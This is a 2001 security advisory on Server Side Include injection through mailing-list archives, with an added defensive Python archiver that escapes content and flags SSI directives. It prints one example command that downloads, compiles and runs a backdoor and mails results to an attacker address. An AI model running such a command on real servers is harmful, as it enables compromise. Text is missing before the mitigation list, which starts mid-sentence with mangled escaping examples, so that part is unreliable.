admin@cgisecurity.com

Email Archives may allow Distributed Attacks against users and Web servers

I Introduction

Mailing lists are often archived for later viewing on websites. The software that archives these email messages may allow an attacker to execute commands, include false information, or cause a wide-scale browser DoS, among other possibilities. Millions of sites archive these mailing lists, and each site archiving a malicious post could either be attacked or help launch an attack.

II Examples: Server Side Includes

If an attacker sends an email containing a Server Side Include (SSI) tag, it may be possible to carry out the attack types listed below.

* (Client side) Including of large files, which may lead to a small Denial of Service of clients. (Bandwidth consumption, memory consumption, etc.)
* (Client/Server side) Including of local files such as /dev/urandom, which will not only slow down the server and eat up bandwidth, but possibly DoS the client viewing the page.
* (Server side) Commands to get executed. The server may execute the SSI request if the server is configured correctly. This could lead to possible web server compromise. With the right series of commands an attacker could download and install a backdoor with web server privileges. Below is an example to give you an idea.

    id;wget http://host/backdoor.c;cc backdoor.c;./a.out ;mail attacker@host

is present to help prevent execution of html/other. (Example: hi becomes <\b>hi<\/b> or becomes <\b/>hi<\/b/> )

* Removing the < and > altogether, but if program code or math is involved in the post it may remove important information.
* The best solution would be to print out the archives in txt format so no code can be executed.

Published to the Public October 2001
Copyright October 2001 Cgisecurity.com
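The mitigation direction above, as an added example that is not part of the original advisory: an archiver that writes message content as inert text and reports any SSI directives it saw. It uses HTML entity encoding rather than the backslash form shown above, so code or math in a post stays readable; the function names and the sample message are constructed for illustration.

```python
import html
import re
from email import message_from_string

# Opening of an SSI directive, e.g. <!--#include ... --> or <!--#exec ... -->
SSI_DIRECTIVE = re.compile(r"<!--\s*#\s*([a-zA-Z]+)")

def extract_text(raw_message):
    """Return (subject, text) using only the text/plain parts of a message."""
    msg = message_from_string(raw_message)
    parts = []
    for part in msg.walk():
        if part.get_content_type() == "text/plain":
            charset = part.get_content_charset() or "utf-8"
            payload = part.get_payload(decode=True)
            parts.append(payload.decode(charset, errors="replace"))
    return msg.get("Subject", ""), "\n".join(parts)

def find_ssi_directives(text):
    """List directive names (include, exec, echo, ...) found in untrusted text."""
    return [m.group(1).lower() for m in SSI_DIRECTIVE.finditer(text)]

def render_archive_page(raw_message):
    """Build an archive page in which all message content is inert text."""
    subject, body = extract_text(raw_message)
    # '<' becomes '&lt;', so neither the browser nor an SSI-enabled web server
    # finds a tag or a '<!--#' directive in the stored file.
    safe_subject = html.escape(subject, quote=True)
    safe_body = html.escape(body, quote=True)
    return (
        "<html><head><title>%s</title></head>\n"
        "<body><h1>%s</h1>\n<pre>%s</pre></body></html>\n"
        % (safe_subject, safe_subject, safe_body)
    )

# Constructed sample post: a benign SSI directive plus a line of "math".
SAMPLE = (
    "From: poster@example.org\n"
    "Subject: test <b>post</b>\n"
    "Content-Type: text/plain; charset=us-ascii\n"
    "\n"
    "Hello list,\n"
    '<!--#echo var="DATE_LOCAL" -->\n'
    "if a < b and b > c then ...\n"
)

if __name__ == "__main__":
    print("directives seen:", find_ssi_directives(extract_text(SAMPLE)[1]))
    print(render_archive_page(SAMPLE))
```

Header fields such as the subject need the same treatment as the body, since archive software prints them into the page as well.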